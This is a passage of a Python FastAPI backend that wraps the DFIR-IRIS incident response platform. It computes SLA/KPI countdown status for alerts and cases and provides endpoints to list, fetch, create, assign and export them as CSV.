  2227. return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)
  2228. start = _parse(created_at)
  2229. thresholds = [("S1", "#22c55e", 25), ("S2", "#eab308", 50), ("S3", "#f97316", 75), ("S4", "#ef4444", 100)]
  2230. if resolved_at:
  2231. end = _parse(resolved_at)
  2232. elapsed = max(0, (end - start).total_seconds()) # clamp: close_date can't precede open_date
  2233. elapsed_pct = min(elapsed / sla * 100, 100)
  2234. kpi_pct = max(100 - elapsed_pct, 0)
  2235. segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds]
  2236. return {
  2237. "kpi_pct": round(kpi_pct, 1),
  2238. "elapsed_pct": round(elapsed_pct, 1),
  2239. "status": "Resolved",
  2240. "segments": segments,
  2241. "resolved": True,
  2242. }
  2243. elapsed = (datetime.now(timezone.utc) - start).total_seconds()
  2244. elapsed_pct = min(elapsed / sla * 100, 100)
  2245. kpi_pct = max(100 - elapsed_pct, 0)
  2246. segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds]
  2247. if kpi_pct >= 80:
  2248. status = "On Track"
  2249. elif kpi_pct >= 60:
  2250. status = "Watch"
  2251. elif kpi_pct >= 40:
  2252. status = "Warning"
  2253. elif kpi_pct >= 20:
  2254. status = "Urgent"
  2255. elif kpi_pct > 0:
  2256. status = "Critical"
  2257. else:
  2258. status = "Breached"
  2259. return {
  2260. "kpi_pct": round(kpi_pct, 1),
  2261. "elapsed_pct": round(elapsed_pct, 1),
  2262. "status": status,
  2263. "segments": segments,
  2264. "resolved": False,
  2265. }
  2266. def _enrich_alerts_with_kpi(iris_response: dict) -> dict:
  2267. """Inject kpi field into each alert row returned by IRIS.
  2268. IRIS GET /api/v2/alerts returns: { "total": N, "data": [...], ... }
  2269. """
  2270. alerts = iris_response.get("data", [])
  2271. if not isinstance(alerts, list):
  2272. return iris_response
  2273. for alert in alerts:
  2274. created_at = alert.get("alert_creation_time") or ""
  2275. severity = (alert.get("severity") or {}).get("severity_name", "Medium")
  2276. if not created_at:
  2277. continue
  2278. resolved_at: str | None = None
  2279. if alert.get("alert_resolution_status_id") is not None:
  2280. history: dict = alert.get("modification_history") or {}
  2281. if history:
  2282. last_ts = max(history.keys(), key=lambda k: float(k))
  2283. resolved_at = datetime.fromtimestamp(float(last_ts), tz=timezone.utc).isoformat()
  2284. try:
  2285. alert["kpi"] = compute_kpi(created_at, severity, resolved_at)
  2286. except Exception:
  2287. alert["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False}
  2288. return iris_response
  2289. def _enrich_cases_with_kpi(iris_response: dict) -> dict:
  2290. # v2 cases list: { "data": [...], "total": N, ... }
  2291. # Each case uses open_date / close_date / state.state_name / severity_id
  2292. _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"} # severity_id → name
  2293. cases = iris_response.get("data") or iris_response.get("items", [])
  2294. if not isinstance(cases, list):
  2295. return iris_response
  2296. for case in cases:
  2297. created_at = case.get("open_date") or ""
  2298. if not created_at:
  2299. continue
  2300. sev_id = case.get("severity_id") or 1
  2301. severity = _CASE_SEV.get(int(sev_id), "Medium")
  2302. resolved_at = None
  2303. close_date = case.get("close_date")
  2304. state_name = ((case.get("state") or {}).get("state_name") or "").lower()
  2305. if close_date:
  2306. resolved_at = close_date
  2307. elif state_name == "closed":
  2308. resolved_at = created_at
  2309. try:
  2310. case["kpi"] = compute_kpi(created_at, severity, resolved_at)
  2311. except Exception:
  2312. case["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False}
  2313. return iris_response
  2314. @app.get(
  2315. "/iris/cases/export-csv",
  2316. summary="Export IRIS cases as CSV",
  2317. description="Download all cases (up to 1000) with KPI as a CSV attachment.",
  2318. )
  2319. async def iris_export_cases_csv() -> StreamingResponse:
  2320. try:
  2321. raw = await iris_adapter.list_cases(limit=1000, offset=0)
  2322. except Exception as exc:
  2323. raise HTTPException(status_code=502, detail=f"IRIS case export failed: {exc}") from exc
  2324. enriched = _enrich_cases_with_kpi(raw)
  2325. cases = enriched.get("data") or enriched.get("items", [])
  2326. _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"}
  2327. output = io.StringIO()
  2328. fieldnames = ["case_id", "case_name", "severity", "state", "open_date", "close_date", "kpi_pct", "kpi_status"]
  2329. writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore")
  2330. writer.writeheader()
  2331. for case in cases:
  2332. kpi = case.get("kpi", {})
  2333. writer.writerow({
  2334. "case_id": case.get("case_id", ""),
  2335. "case_name": case.get("case_name", ""),
  2336. "severity": _CASE_SEV.get(int(case.get("severity_id") or 1), "Medium"),
  2337. "state": (case.get("state") or {}).get("state_name", ""),
  2338. "open_date": case.get("open_date", ""),
  2339. "close_date": case.get("close_date", ""),
  2340. "kpi_pct": kpi.get("kpi_pct", ""),
  2341. "kpi_status": kpi.get("status", ""),
  2342. })
  2343. output.seek(0)
  2344. return StreamingResponse(
  2345. iter([output.getvalue()]),
  2346. media_type="text/csv",
  2347. headers={"Content-Disposition": "attachment; filename=iris_cases.csv"},
  2348. )
  2349. @app.get(
  2350. "/iris/cases/{case_id}",
  2351. response_model=ApiResponse,
  2352. summary="Get single IRIS case with KPI",
  2353. description="Fetch one DFIR-IRIS case by ID and annotate with computed KPI data.",
  2354. )
  2355. async def iris_get_case(case_id: int) -> ApiResponse:
  2356. try:
  2357. raw = await iris_adapter.get_case(case_id)
  2358. except Exception as exc:
  2359. raise HTTPException(status_code=502, detail=f"IRIS case fetch failed: {exc}") from exc
  2360. wrapper = {"data": [raw]}
  2361. enriched = _enrich_cases_with_kpi(wrapper)
  2362. case_out = enriched["data"][0] if enriched.get("data") else raw
  2363. return ApiResponse(data={"case": case_out})
  2364. @app.get(
  2365. "/iris/cases",
  2366. response_model=ApiResponse,
  2367. summary="List IRIS cases with KPI",
  2368. description="Fetch cases from DFIR-IRIS and annotate each with computed KPI data.",
  2369. )
  2370. async def iris_list_cases(
  2371. page: int = 1,
  2372. per_page: int = 20,
  2373. sort_by: str = "case_id",
  2374. sort_dir: str = "desc",
  2375. filter_name: str | None = None,
  2376. ) -> ApiResponse:
  2377. # adapter maps (limit, offset) → (per_page, page) for IRIS v2
  2378. offset = (page - 1) * per_page
  2379. try:
  2380. raw = await iris_adapter.list_cases(limit=per_page, offset=offset)
  2381. except Exception as exc:
  2382. raise HTTPException(status_code=502, detail=f"IRIS case list failed: {exc}") from exc
  2383. enriched = _enrich_cases_with_kpi(raw)
  2384. items = enriched.get("data") or enriched.get("items", [])
  2385. total = enriched.get("total", len(items))
  2386. last_page = enriched.get("last_page", max(1, -(-total // per_page)))
  2387. if filter_name:
  2388. items = [c for c in items if filter_name.lower() in (c.get("case_name") or "").lower()]
  2389. reverse = sort_dir == "desc"
  2390. items.sort(key=lambda c: c.get(sort_by) or 0, reverse=reverse)
  2391. return ApiResponse(data={"cases": {
  2392. "data": items,
  2393. "total": total,
  2394. "current_page": page,
  2395. "last_page": last_page,
  2396. }})
  2397. @app.post(
  2398. "/iris/alerts",
  2399. response_model=ApiResponse,
  2400. summary="Create IRIS alert",
  2401. description="Create a new alert in DFIR-IRIS via /api/v2/alerts.",
  2402. )
  2403. async def iris_create_alert(payload: IrisAlertCreateRequest) -> ApiResponse:
  2404. alert_payload: dict[str, Any] = {
  2405. "alert_title": payload.title,
  2406. "alert_description": payload.description,
  2407. "alert_severity_id": payload.severity_id,
  2408. "alert_status_id": payload.status_id,
  2409. "alert_source": payload.source,
  2410. "alert_customer_id": payload.customer_id or settings.iris_default_customer_id,
  2411. "alert_source_event_time": datetime.now(timezone.utc).isoformat(),
  2412. }
  2413. if payload.source_ref:
  2414. alert_payload["alert_source_ref"] = payload.source_ref
  2415. if payload.payload:
  2416. alert_payload.update(payload.payload)
  2417. try:
  2418. result = await iris_adapter.create_alert(alert_payload)
  2419. except Exception as exc:
  2420. raise HTTPException(status_code=502, detail=f"IRIS alert create failed: {exc}") from exc
  2421. return ApiResponse(data={"alert": result})
  2422. @app.get(
  2423. "/iris/alerts",
  2424. response_model=ApiResponse,
  2425. summary="List IRIS alerts with KPI Timeout",
  2426. description="Fetch alerts from DFIR-IRIS and annotate each row with computed KPI Timeout data.",
  2427. )
  2428. async def iris_list_alerts(
  2429. page: int = 1,
  2430. per_page: int = 20,
  2431. sort_by: str = "alert_id",
  2432. sort_dir: str = "desc",
  2433. filter_title: str | None = None,
  2434. filter_owner_id: int | None = None,
  2435. ) -> ApiResponse:
  2436. try:
  2437. raw = await iris_adapter.list_alerts(
  2438. page=page,
  2439. per_page=per_page,
  2440. sort_by=sort_by,
  2441. sort_dir=sort_dir,
  2442. filter_title=filter_title,
  2443. filter_owner_id=filter_owner_id,
  2444. )
  2445. enriched = _enrich_alerts_with_kpi(raw)
  2446. return ApiResponse(data={
  2447. "alerts": {
  2448. "data": enriched.get("data", []),
  2449. "total": enriched.get("total", 0),
  2450. "current_page": enriched.get("current_page", page),
  2451. "last_page": enriched.get("last_page", 1),
  2452. }
  2453. })
  2454. except Exception as exc:
  2455. raise HTTPException(status_code=502, detail=f"IRIS alert list failed: {exc}") from exc
  2456. @app.get(
  2457. "/iris/alerts/export-csv",
  2458. summary="Export IRIS alerts as CSV",
  2459. description="Download all matching alerts (up to 1000) as a CSV attachment.",
  2460. )
  2461. async def iris_export_alerts_csv(
  2462. sort_by: str = "alert_id",
  2463. sort_dir: str = "desc",
  2464. filter_title: str | None = None,
  2465. filter_owner_id: int | None = None,
  2466. ) -> StreamingResponse:
  2467. try:
  2468. raw = await iris_adapter.list_alerts(
  2469. page=1,
  2470. per_page=1000,
  2471. sort_by=sort_by,
  2472. sort_dir=sort_dir,
  2473. filter_title=filter_title,
  2474. filter_owner_id=filter_owner_id,
  2475. )
  2476. except Exception as exc:
  2477. raise HTTPException(status_code=502, detail=f"IRIS alert export failed: {exc}") from exc
  2478. enriched = _enrich_alerts_with_kpi(raw)
  2479. alerts = enriched.get("data", [])
  2480. output = io.StringIO()
  2481. fieldnames = [
  2482. "alert_id", "alert_title", "alert_severity", "alert_status",
  2483. "alert_creation_time", "alert_source_event_time", "alert_owner",
  2484. "kpi_pct", "kpi_status",
  2485. ]
  2486. writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore")
  2487. writer.writeheader()
  2488. for alert in alerts:
  2489. kpi = alert.get("kpi", {})
  2490. severity_name = (alert.get("severity") or {}).get("severity_name", "")
  2491. writer.writerow({
  2492. "alert_id": alert.get("alert_id", ""),
  2493. "alert_title": alert.get("alert_title", ""),
  2494. "alert_severity": severity_name,
  2495. "alert_status": (alert.get("status") or {}).get("status_name", ""),
  2496. "alert_creation_time": alert.get("alert_creation_time", ""),
  2497. "alert_source_event_time": alert.get("alert_source_event_time", ""),
  2498. "alert_owner": (alert.get("owner") or {}).get("user_name", ""),
  2499. "kpi_pct": kpi.get("kpi_pct", ""),
  2500. "kpi_status": kpi.get("status", ""),
  2501. })
  2502. output.seek(0)
  2503. return StreamingResponse(
  2504. iter([output.getvalue()]),
  2505. media_type="text/csv",
  2506. headers={"Content-Disposition": "attachment; filename=iris_alerts.csv"},
  2507. )
  2508. @app.get(
  2509. "/iris/alerts/{alert_id}",
  2510. response_model=ApiResponse,
  2511. summary="Get single IRIS alert with KPI",
  2512. description="Fetch one DFIR-IRIS alert by ID and annotate with computed KPI data.",
  2513. )
  2514. async def iris_get_alert(alert_id: int) -> ApiResponse:
  2515. try:
  2516. raw = await iris_adapter.get_alert(alert_id)
  2517. except Exception as exc:
  2518. raise HTTPException(status_code=502, detail=f"IRIS alert fetch failed: {exc}") from exc
  2519. # Wrap in list-shaped dict so _enrich_alerts_with_kpi can process it
  2520. alert = raw if isinstance(raw, dict) else {}
  2521. wrapper = {"data": [alert]}
  2522. enriched = _enrich_alerts_with_kpi(wrapper)
  2523. alert_out = enriched["data"][0] if enriched.get("data") else alert
  2524. return ApiResponse(data={"alert": alert_out})
  2525. @app.post(
  2526. "/iris/alerts/{alert_id}/assign",
  2527. response_model=ApiResponse,
  2528. summary="Assign IRIS alert to owner",
  2529. description="Update the owner of a DFIR-IRIS alert.",
  2530. )
  2531. async def iris_assign_alert(alert_id: int, body: dict) -> ApiResponse:
  2532. owner_id = body.get("owner_id")
  2533. if not isinstance(owner_id, int):
  2534. raise HTTPException(status_code=422, detail="owner_id must be an integer")
  2535. try:
  2536. result = await iris_adapter.assign_alert(alert_id=alert_id, owner_id=owner_id)
  2537. return ApiResponse(data=result)
  2538. except Exception as exc:
  2539. raise HTTPException(status_code=502, detail=f"IRIS alert assign failed: {exc}") from exc